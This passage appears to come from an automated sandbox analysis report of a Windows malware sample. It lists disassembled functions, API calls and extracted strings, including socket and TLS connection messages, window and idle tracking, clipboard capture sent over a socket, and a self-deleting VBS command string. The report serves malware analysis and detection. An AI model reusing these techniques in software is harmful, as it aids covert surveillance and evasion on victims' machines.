                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00404EA9
                                • SetEvent.KERNEL32(00000000), ref: 00404EBA
                                • CloseHandle.KERNEL32(00000000), ref: 00404EBF
                                • CloseHandle.KERNEL32(00000000), ref: 00404EC4
                                • SetEvent.KERNEL32(00000000), ref: 00404ED1
                                • CloseHandle.KERNEL32(00000000), ref: 00404ED6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                • String ID: PkGNG
                                • API String ID: 3658366068-263838557
                                • Opcode ID: 87d744648c5afa45b50529b6b6d14d146fbf4d1d8295755f98280c9be6f36435
                                • Instruction ID: 0c11cd9b042c69dc9d4dd2828563f6d61870a883144e53252efabab5b24bcc37
                                • Opcode Fuzzy Hash: 87d744648c5afa45b50529b6b6d14d146fbf4d1d8295755f98280c9be6f36435
                                • Instruction Fuzzy Hash: BF21E871104B04AFDB216B26DC49B27BBA1FF40326F104A2EE2E211AF1CB75B851DB58
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00445D56 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$Info
                                • String ID:
                                • API String ID: 2509303402-0
                                • Opcode ID: 5c7b1bf4f475568e38e69d940d0222fa4f9c7dd3754b5f784b0771feacd0cc66
                                • Instruction ID: 88ee944febda996c7adaaf7605242af7944d99fb061a5fd2e4f26fad8993db39
                                • Opcode Fuzzy Hash: 5c7b1bf4f475568e38e69d940d0222fa4f9c7dd3754b5f784b0771feacd0cc66
                                • Instruction Fuzzy Hash: 75B1CD719006059FEF20DF69C881BEEBBB4FF09304F14412EF5A8A7242D6799D45CB65
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040A726 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 163sleepCOMMON
                                Download Yara Rule
                                APIs
                                • Sleep.KERNEL32(00001388), ref: 0040A740
                                  • Part of subcall function 0040A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
                                  • Part of subcall function 0040A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                  • Part of subcall function 0040A675: Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                  • Part of subcall function 0040A675: CloseHandle.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE
                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A77C
                                • GetFileAttributesW.KERNEL32(00000000), ref: 0040A78D
                                • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7A4
                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A81E
                                  • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466468,00000000,00000000,00000000), ref: 0040A927
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                • String ID: (x$8SG$8SG$hdF$pQG$pQG
                                • API String ID: 3795512280-3569947409
                                • Opcode ID: 90f81a8c835b78a509db603d52e056b33c5ce4745e21562e65a9418a5dbb7178
                                • Instruction ID: 265ddfea45d140738b9a7e0f0353a6f5be26653907181caffe3561bb72ed66c0
                                • Opcode Fuzzy Hash: 90f81a8c835b78a509db603d52e056b33c5ce4745e21562e65a9418a5dbb7178
                                • Instruction Fuzzy Hash: A7517E716043055ACB09BB32C866ABE739A9F80349F00483FB642B71E2DF7C9D09865E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040D7FF Relevance: 21.1, APIs: 3, Strings: 9, Instructions: 148COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
                                  • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873
                                  • Part of subcall function 004136F8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00413714
                                  • Part of subcall function 004136F8: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 0041372D
                                  • Part of subcall function 004136F8: RegCloseKey.ADVAPI32(?), ref: 00413738
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D859
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D9B8
                                • ExitProcess.KERNEL32 ref: 0040D9C4
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$hdF$open
                                • API String ID: 1913171305-51354631
                                • Opcode ID: f258cf52c1f85b39fd526d8af0fa5692be2d229592be5a4268ec070556a5325b
                                • Instruction ID: 6fc8d312854778a25908ca85050b1cee1951ef16e4956e50e312a563d71e527c
                                • Opcode Fuzzy Hash: f258cf52c1f85b39fd526d8af0fa5692be2d229592be5a4268ec070556a5325b
                                • Instruction Fuzzy Hash: 0C413A719001195ACB15FA62DC56DEEB778AF50309F10007FB10AB61E2EF785E4ACA98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004048C8 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 144networkCOMMON
                                Download Yara Rule
                                APIs
                                • connect.WS2_32(FFFFFFFF,?,?), ref: 004048E0
                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                • WSAGetLastError.WS2_32 ref: 00404A21
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                • String ID: Connection Failed: $Connection Refused$PkGNG$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                • API String ID: 994465650-3229884001
                                • Opcode ID: 73075052d8b02f035b309482e82d4e6ffd926ef573fac63689623bdc7e9bf8aa
                                • Instruction ID: c5d57dbf39bf42eeb7f1fe8451fa1a1ddda5cb55b73798f96fdafd5064c5310c
                                • Opcode Fuzzy Hash: 73075052d8b02f035b309482e82d4e6ffd926ef573fac63689623bdc7e9bf8aa
                                • Instruction Fuzzy Hash: 3E41E8B47406016BD61877BA8D1B53E7A15AB81304B50017FE60267AD3EB7D9C108BDF
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004512C6 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • ___free_lconv_mon.LIBCMT ref: 0045130A
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 0045051F
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 00450531
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 00450543
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 00450555
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 00450567
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 00450579
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 0045058B
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 0045059D
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 004505AF
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 004505C1
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 004505D3
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 004505E5
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 004505F7
                                • _free.LIBCMT ref: 004512FF
                                  • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                  • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                • _free.LIBCMT ref: 00451321
                                • _free.LIBCMT ref: 00451336
                                • _free.LIBCMT ref: 00451341
                                • _free.LIBCMT ref: 00451363
                                • _free.LIBCMT ref: 00451376
                                • _free.LIBCMT ref: 00451384
                                • _free.LIBCMT ref: 0045138F
                                • _free.LIBCMT ref: 004513C7
                                • _free.LIBCMT ref: 004513CE
                                • _free.LIBCMT ref: 004513EB
                                • _free.LIBCMT ref: 00451403
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                • String ID:
                                • API String ID: 161543041-0
                                • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                • Instruction ID: 673b37a441ff9bbb7eb6cd98574e5fa8379d72fae64c09c4febd1ea684bb8cd8
                                • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                • Instruction Fuzzy Hash: 0E319E315007009FFB20AA7AD845B5B73E8EF0131AF50851FEC68D7662DF78AD448B59
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00450600 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free
                                • String ID:
                                • API String ID: 269201875-0
                                • Opcode ID: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
                                • Instruction ID: d910990a8472ee08c0279d8077499983e41ff25138a9859a729e4309013b5263
                                • Opcode Fuzzy Hash: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
                                • Instruction Fuzzy Hash: E2C17476D40204AFEB20DBA9CC83FDE77B8AB19705F14015AFE05EB283D6B49D458798
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00455BDB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004558A9: CreateFileW.KERNEL32(00000000,00000000,?,00455C84,?,?,00000000,?,00455C84,00000000,0000000C), ref: 004558C6
                                • GetLastError.KERNEL32 ref: 00455CEF
                                • __dosmaperr.LIBCMT ref: 00455CF6
                                • GetFileType.KERNEL32(00000000), ref: 00455D02
                                • GetLastError.KERNEL32 ref: 00455D0C
                                • __dosmaperr.LIBCMT ref: 00455D15
                                • CloseHandle.KERNEL32(00000000), ref: 00455D35
                                • CloseHandle.KERNEL32(?), ref: 00455E7F
                                • GetLastError.KERNEL32 ref: 00455EB1
                                • __dosmaperr.LIBCMT ref: 00455EB8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                • String ID: H
                                • API String ID: 4237864984-2852464175
                                • Opcode ID: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                                • Instruction ID: f4290dc4267d91ba683862cdaabef3013db21248f4240db41616def06e578eae
                                • Opcode Fuzzy Hash: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                                • Instruction Fuzzy Hash: D5A155329106049FDF19AF68DC617BE3BA0EB06325F14415EEC11EB392CB398D5ACB59
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00453D83 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 268COMMON
                                Download Yara Rule
                                APIs
                                • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453E2F
                                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453EB2
                                • __alloca_probe_16.LIBCMT ref: 00453EEA
                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,00000001,00000000,\@E,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F45
                                • __alloca_probe_16.LIBCMT ref: 00453F94
                                • MultiByteToWideChar.KERNEL32(00000001,00000009,00000001,00000000,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F5C
                                  • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                • MultiByteToWideChar.KERNEL32(00000001,00000001,00000001,00000000,00000000,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FD8
                                • __freea.LIBCMT ref: 00454003
                                • __freea.LIBCMT ref: 0045400F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                • String ID: \@E
                                • API String ID: 201697637-1814623452
                                • Opcode ID: a13eae8444da2cd2cd5bd958d846eb3c57669df7893581f63a52b2ce53b4c5f1
                                • Instruction ID: bd5a1837779a5f2dcb5c2ea5aeb828518df7829aba760434011a70bbc407b236
                                • Opcode Fuzzy Hash: a13eae8444da2cd2cd5bd958d846eb3c57669df7893581f63a52b2ce53b4c5f1
                                • Instruction Fuzzy Hash: E391F472E002069ADB209E65CC42AEFBBF59F09756F14052BFC01E7282D739DD89C768
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0044AC49 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 216COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,$C,0043EA24,?,?,PkGNG,0044AE9A,00000001,00000001,73E85006), ref: 0044ACA3
                                • __alloca_probe_16.LIBCMT ref: 0044ACDB
                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,PkGNG,0044AE9A,00000001,00000001,73E85006,?,?,?), ref: 0044AD29
                                • __alloca_probe_16.LIBCMT ref: 0044ADC0
                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,73E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AE23
                                • __freea.LIBCMT ref: 0044AE30
                                  • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                • __freea.LIBCMT ref: 0044AE39
                                • __freea.LIBCMT ref: 0044AE5E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                • String ID: $C$PkGNG
                                • API String ID: 3864826663-3740547665
                                • Opcode ID: f1dce60ce4001dd5a90d09b77d0bc29d4a24cdc1178cf7b183dfabd27102bb0f
                                • Instruction ID: b5b01290aead076256688b5938d42e4b2a7c64905c3dece0b68445a47d4ef5f6
                                • Opcode Fuzzy Hash: f1dce60ce4001dd5a90d09b77d0bc29d4a24cdc1178cf7b183dfabd27102bb0f
                                • Instruction Fuzzy Hash: 1F513A72680206AFFB258F64CC41EBF77AAEB44714F24462EFC14D6240EB38DC60875A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00450A25 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 204COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free
                                • String ID: \&G$\&G$`&G
                                • API String ID: 269201875-253610517
                                • Opcode ID: 2933b358ac1f2d15da9e4f95fb537f888405f593b8ad3400f10d75b262a195a6
                                • Instruction ID: 0b3297c67b001fbc5a9f4fbe1fd197d652097ca420ae28a40b4f72db8b3ed5d1
                                • Opcode Fuzzy Hash: 2933b358ac1f2d15da9e4f95fb537f888405f593b8ad3400f10d75b262a195a6
                                • Instruction Fuzzy Hash: 77610475900204AFDB20CFA9C882B9ABBF4EF05315F14416BED58EB342D774AD458B98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00414BB0 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 65535$udp
                                • API String ID: 0-1267037602
                                • Opcode ID: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                                • Instruction ID: ff24d6befd6f0703c902a6165bd45161ed4db0fb5f75d2635e7e580b9b2721aa
                                • Opcode Fuzzy Hash: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                                • Instruction Fuzzy Hash: EF51E7756093019FDB209B58E9057BB37A4AFC4755F08082FF881973A1E76DCCC1865E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040ACD6 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156sleepCOMMON
                                Download Yara Rule
                                APIs
                                • __Init_thread_footer.LIBCMT ref: 0040AD38
                                • Sleep.KERNEL32(000001F4), ref: 0040AD43
                                • GetForegroundWindow.USER32 ref: 0040AD49
                                • GetWindowTextLengthW.USER32(00000000), ref: 0040AD52
                                • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040AD86
                                • Sleep.KERNEL32(000003E8), ref: 0040AE54
                                  • Part of subcall function 0040A636: SetEvent.KERNEL32(00000000,?,00000000,0040B20A,00000000), ref: 0040A662
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                • String ID: [${ User has been idle for $ minutes }$]
                                • API String ID: 911427763-3954389425
                                • Opcode ID: d029bd4235179839c9baf363e6aa800d014436574332bd325cff9a7a557b710f
                                • Instruction ID: 3d5ee5432c15115af2c0f1375ae13a0ba8112eb59c463c5c733e63bb31497985
                                • Opcode Fuzzy Hash: d029bd4235179839c9baf363e6aa800d014436574332bd325cff9a7a557b710f
                                • Instruction Fuzzy Hash: 6D51B1316043419BD314FB21D846AAE7796AB84308F50093FF586A22E2EF7C9D45C69F
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00416940 Relevance: 17.5, APIs: 8, Strings: 2, Instructions: 46clipboardCOMMON
                                Download Yara Rule
                                APIs
                                • OpenClipboard.USER32 ref: 00416941
                                • EmptyClipboard.USER32 ref: 0041694F
                                • CloseClipboard.USER32 ref: 00416955
                                • OpenClipboard.USER32 ref: 0041695C
                                • GetClipboardData.USER32(0000000D), ref: 0041696C
                                • GlobalLock.KERNEL32(00000000), ref: 00416975
                                • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                • CloseClipboard.USER32 ref: 00416984
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
